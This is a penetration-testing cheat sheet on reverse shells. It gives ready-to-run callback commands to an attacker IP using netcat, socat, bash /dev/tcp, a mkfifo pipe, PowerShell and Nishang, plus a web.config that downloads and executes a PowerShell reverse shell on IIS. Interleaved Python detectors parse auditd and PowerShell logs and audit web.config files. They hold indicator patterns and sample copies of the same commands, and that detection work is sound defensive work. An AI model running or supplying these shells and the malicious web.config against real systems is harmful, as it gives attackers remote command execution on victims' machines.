# Reverse Shell

## Netcat

On the attacker computer, first start a listener as follows:

```bash
attacker> $ nc -nvlp 443
```

On the victim shell, connect back to the attacker's IP on the same port the listener uses (443 here):

```bash
victim> $ nc -nv <attacker.IP> 443 -e /bin/bash
```

## Socat

On the attacker machine, run socat:

```bash
attacker> $ socat -d -d TCP4-LISTEN:4444 STDOUT
```

Then, on the victim shell, connect back to the attacker's IP on the same port:

```bash
victim> $ socat TCP4:<attacker.IP>:4444 EXEC:/bin/bash
```

## Bash

As before, start a listener on the attacker computer.

```bash
attacker> $ nc -nvlp 443
```

Then, run the following bash instructions on the victim machine.

```bash
victim> $ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker.IP> 443 >/tmp/f
```

From a simple web shell, the following command can be useful:

```bash
bash -c 'bash -i >& /dev/tcp/<attacker.IP>/443 0>&1'
```

{% hint style="info" %}
Resource: <https://www.revshells.com/>
{% endhint %}
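From the defender's side, the Netcat, Socat and Bash variants above each leave a distinctive execve record on a victim host running auditd. The following Python script is an added example, not part of this page or of any tool it references: it parses constructed auditd EXECVE records, decodes the hex-encoded arguments auditd emits for any argv value containing spaces or shell metacharacters (which is exactly how the `bash -c` and `mkfifo` one-liners get logged), and matches the resulting command line against indicators for the four techniques. The sample records, the indicator names and the 10.0.0.5 address are all constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# auditd writes each execve argument as a<N>="value", or as a<N>=<HEX> when
# the value contains whitespace or special characters.
_ARG_RE = re.compile(r'\b(a\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

# Indicator patterns for the techniques in the Netcat, Socat and Bash sections.
_NETCAT_EXEC = re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&]*\s-[ec](?:\s|$)")
_DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/")
_NETCAT_ANY = re.compile(r"\b(?:nc|ncat|netcat)\b")


def parse_execve(record: str) -> List[str]:
    """Return argv from one auditd EXECVE record, decoding hex-encoded args."""
    args: Dict[int, str] = {}
    for name, quoted, hexed in _ARG_RE.findall(record):
        idx = int(name[1:])
        if hexed:
            args[idx] = bytes.fromhex(hexed).decode("utf-8", errors="replace")
        else:
            args[idx] = quoted
    return [args[i] for i in sorted(args)]


def reverse_shell_indicators(argv: List[str]) -> List[str]:
    """Return the names of reverse-shell indicators matched by one argv."""
    if not argv:
        return []
    cmdline = " ".join(argv)
    prog = argv[0].rsplit("/", 1)[-1]
    found: List[str] = []
    if _NETCAT_EXEC.search(cmdline):
        found.append("netcat-exec")   # nc ... -e /bin/bash
    if _DEV_TCP.search(cmdline):
        found.append("bash-devtcp")   # bash -i >& /dev/tcp/host/port
    if "mkfifo" in cmdline and _NETCAT_ANY.search(cmdline):
        found.append("fifo-netcat")   # mkfifo /tmp/f; ... | nc host port
    if prog == "socat" and any(a.startswith(("EXEC:", "SYSTEM:")) for a in argv[1:]):
        found.append("socat-exec")    # socat TCP4:host:port EXEC:/bin/bash
    return found


def scan_audit_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (command line, indicators) for every EXECVE record that matches."""
    hits: List[Tuple[str, List[str]]] = []
    for line in lines:
        if "type=EXECVE" not in line:
            continue
        argv = parse_execve(line)
        indicators = reverse_shell_indicators(argv)
        if indicators:
            hits.append((" ".join(argv), indicators))
    return hits


def _hex(value: str) -> str:
    """Encode an argument the way auditd does for values containing spaces."""
    return value.encode().hex().upper()


# Constructed sample records (not real captures); 10.0.0.5 is a placeholder.
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1700000000.101:201): argc=2 a0="ls" a1="-la"',
    'type=EXECVE msg=audit(1700000000.102:202): argc=6 a0="nc" a1="-nv" '
    'a2="10.0.0.5" a3="443" a4="-e" a5="/bin/bash"',
    'type=EXECVE msg=audit(1700000000.103:203): argc=3 a0="socat" '
    'a1="TCP4:10.0.0.5:4444" a2="EXEC:/bin/bash"',
    'type=EXECVE msg=audit(1700000000.104:204): argc=3 a0="sh" a1="-c" a2='
    + _hex("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 443 >/tmp/f"),
    'type=EXECVE msg=audit(1700000000.105:205): argc=3 a0="bash" a1="-c" a2='
    + _hex("bash -i >& /dev/tcp/10.0.0.5/443 0>&1"),
    # plain connectivity check: netcat without -e must not be flagged
    'type=EXECVE msg=audit(1700000000.106:206): argc=4 a0="nc" a1="-zv" a2="10.0.0.5" a3="443"',
]

if __name__ == "__main__":
    for cmdline, indicators in scan_audit_log(SAMPLE_AUDIT_LINES):
        print(f"{', '.join(indicators):<12} {cmdline}")
```

The hex decoding step is the one that matters in practice: a rule that only inspects the quoted `a0`/`a1` fields sees `sh -c` and nothing else, because the whole pipeline lives in the hex-encoded `a2`.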

## PowerShell

On the attacker machine, open a netcat listener:

```bash
attacker> $ nc -lnvp 443
```

Next, send a PowerShell reverse shell from the victim's computer:

```powershell
```powershell
$client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush();
}
$client.Close();
```

The above command can also be run from a command prompt as follows:

{% code overflow="wrap" %}

```powershell
C:\Users\victim> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker.IP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

{% endcode %}

## Nishang

First, grab a copy of [Nishang’s Invoke-PowerShellTcp.ps1](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1). Then, add the following line at the end of the script so that it invokes the callback automatically:

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress <AttackerIp> -Port 443
```

Upload this file to the victim computer and execute it. Make sure a listener is already running on the attacker machine before doing so.
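Both the PowerShell one-liner and the Nishang script end up in PowerShell script block logging (Event ID 4104) when it is enabled, which is where a defender would look for them. The following Python script is an added example, not part of this page, of Nishang, or of any other project: it scores script block text with weighted indicators rather than a single string match, because `TCPClient` and `GetStream()` on their own are common in benign connectivity checks, while `Invoke-Expression` on data read from a socket, or a `Net.WebClient`/`DownloadString` cradle, is the strong signal. It also handles the failure mode that long scripts are logged as several 4104 fragments sharing one `ScriptBlockId`: fragments are reassembled before scoring, and the sample is split so that neither half reaches the threshold alone. The event records, indicator names, weights, threshold and the 10.0.0.5 address are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Weighted indicators. Socket use alone is common in benign scripts, so the
# weight-1 entries only matter in combination; executing text that arrived
# over the network (weight 2) is the strong signal.
INDICATORS = [
    ("tcpclient", re.compile(r"System\.Net\.Sockets\.TCPClient", re.I), 1),
    ("getstream", re.compile(r"\.GetStream\(\)", re.I), 1),
    ("stream-write", re.compile(r"\$\w+\.Write\(", re.I), 1),
    ("invoke-expression", re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I), 2),
    ("download-cradle", re.compile(r"Net\.WebClient.*?DownloadString", re.I | re.S), 2),
]
THRESHOLD = 4  # assumed cut-off for this example


def score_script(text: str) -> Tuple[int, List[str]]:
    """Score one complete script block; returns (score, matched indicator names)."""
    matched = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in matched)
    return score, matched


def reassemble(events: List[Dict]) -> Dict[str, str]:
    """Join the fragments of each ScriptBlockId in MessageNumber order."""
    parts: Dict[str, Dict[int, str]] = defaultdict(dict)
    for ev in events:
        parts[ev["ScriptBlockId"]][ev["MessageNumber"]] = ev["ScriptBlockText"]
    return {sbid: "".join(frag[n] for n in sorted(frag)) for sbid, frag in parts.items()}


def find_suspicious(events: List[Dict]) -> Dict[str, Tuple[int, List[str]]]:
    """Return {ScriptBlockId: (score, indicators)} for blocks at or above THRESHOLD."""
    hits: Dict[str, Tuple[int, List[str]]] = {}
    for sbid, text in reassemble(events).items():
        score, matched = score_script(text)
        if score >= THRESHOLD:
            hits[sbid] = (score, matched)
    return hits


# The PowerShell one-liner from this page, with a placeholder address.
ONE_LINER = (
    "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.5',443);"
    "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
    "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;"
    "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
    "$sendback = (iex $data 2>&1 | Out-String );"
    "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
    "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
)
# Split point chosen so that neither fragment reaches THRESHOLD on its own.
_CUT = ONE_LINER.index("$sendback = (iex")

# Constructed records mirroring the fields of Event ID 4104 (not real logs);
# the two fragments of sb-0001 are deliberately out of order.
EVENTS = [
    {"ScriptBlockId": "sb-0001", "MessageNumber": 2, "MessageTotal": 2,
     "ScriptBlockText": ONE_LINER[_CUT:]},
    {"ScriptBlockId": "sb-0001", "MessageNumber": 1, "MessageTotal": 2,
     "ScriptBlockText": ONE_LINER[:_CUT]},
    {"ScriptBlockId": "sb-0002", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "$c = New-Object System.Net.Sockets.TCPClient('db01',1433);"
                        "if ($c.Connected) { 'open' }; $c.Close()"},
    {"ScriptBlockId": "sb-0003", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "iex(new-object net.webclient).downloadstring("
                        "'http://10.0.0.5/Invoke-PowerShellTcp.ps1')"},
    {"ScriptBlockId": "sb-0004", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-ChildItem C:\\Users | Out-String"},
]

if __name__ == "__main__":
    for sbid, (score, matched) in find_suspicious(EVENTS).items():
        print(f"{sbid}: score={score} {matched}")
```

Scoring per fragment instead of per reassembled block is the common mistake here: each half of the one-liner scores below the threshold, and only the joined text is flagged. The `sb-0002` port check, which uses the same .NET socket class, stays below the threshold.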

## Web.config

This method can be very destructive: if the target application already uses a web.config file, it will be replaced with ours, which may lack required settings such as the database connection string or valid assembly references. It is recommended not to use this technique on live websites where the application may already rely on a web.config file. IIS applications nested inside other applications, or virtual directories, often do not use their own web.config file and are generally safer candidates than the website's root directory.

{% code title="web.config" overflow="wrap" %}

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%@ Language=VBScript %>
<% call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://<AttackerIP>/Invoke-PowerShellTcp.ps1')") %>
```

{% endcode %}

Note that the above content downloads the Nishang PowerShell script from the attacker server and immediately executes it on the victim device. It is therefore necessary to start a web server first, along with a listener on the port specified in the Nishang script (see the previous section). These two operations can be done as follows:

```bash
attacker> $ python -m http.server 80
```

```bash
attacker> $ nc -nvlp 443
```
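What makes the web.config above work is three changes to IIS defaults in one file: a handler that maps `*.config` to a script processor, the removal of `.config` from the blocked file extensions, and the removal of `web.config` from the hidden segments, followed by ASP code after the closing `</configuration>` tag. The following Python script is an added example, not part of this page or of any project: it audits a web.config for exactly those three changes using the standard library XML parser, and handles the fact that the attack file is not well-formed XML at all (the ASP block after the root element makes the parser fail), by recording that as a finding and then auditing the XML that precedes it. The two sample files and the finding names are constructed for the example; the ASP part of the malicious sample is replaced with a harmless marker.

```python
import xml.etree.ElementTree as ET
from typing import List


def audit_web_config(text: str) -> List[str]:
    """Return findings for a web.config; an empty list means nothing suspicious."""
    findings: List[str] = []
    try:
        root = ET.fromstring(text.encode("utf-8"))
    except ET.ParseError:
        # Not well-formed XML. If there is content after </configuration>
        # (as in the attack file), record that and audit the XML part.
        end = text.find("</configuration>")
        if end == -1:
            return ["not-well-formed-xml"]
        findings.append("content-after-root-element")
        root = ET.fromstring(text[: end + len("</configuration>")].encode("utf-8"))

    server = root.find("system.webServer")
    if server is None:
        return findings
    # 1. A handler that hands *.config files to a script processor.
    for handler in server.findall("./handlers/add"):
        if handler.get("path", "").lower().endswith(".config"):
            findings.append(f"handler-maps-config:{handler.get('name')}")
    # 2. .config removed from the request-filtering blocked extensions.
    for rm in server.findall("./security/requestFiltering/fileExtensions/remove"):
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("config-extension-unblocked")
    # 3. web.config removed from the hidden segments.
    for rm in server.findall("./security/requestFiltering/hiddenSegments/remove"):
        if rm.get("segment", "").lower() == "web.config":
            findings.append("web.config-segment-unhidden")
    return findings


# Constructed sample: the structure of the file from this page, with the ASP
# payload replaced by a harmless marker.
MALICIOUS_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule"
           scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll"
           resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions><remove fileExtension=".config" /></fileExtensions>
        <hiddenSegments><remove segment="web.config" /></hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<%@ Language=VBScript %>
<% Response.Write("marker: ASP code after the XML root element") %>
"""

# Constructed sample: an ordinary web.config that leaves the IIS defaults alone.
BENIGN_WEB_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers>
      <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
    </handlers>
    <security>
      <requestFiltering>
        <requestLimits maxAllowedContentLength="30000000" />
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
"""

if __name__ == "__main__":
    for label, cfg in (("malicious", MALICIOUS_WEB_CONFIG), ("benign", BENIGN_WEB_CONFIG)):
        print(label, audit_web_config(cfg) or "clean")
```

Run against every web.config under a site's physical path (and its virtual directories, since those can carry their own file), any hit on the second or third finding deserves a look even without the others: there is rarely a legitimate reason for an application to unblock `.config` from request filtering.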
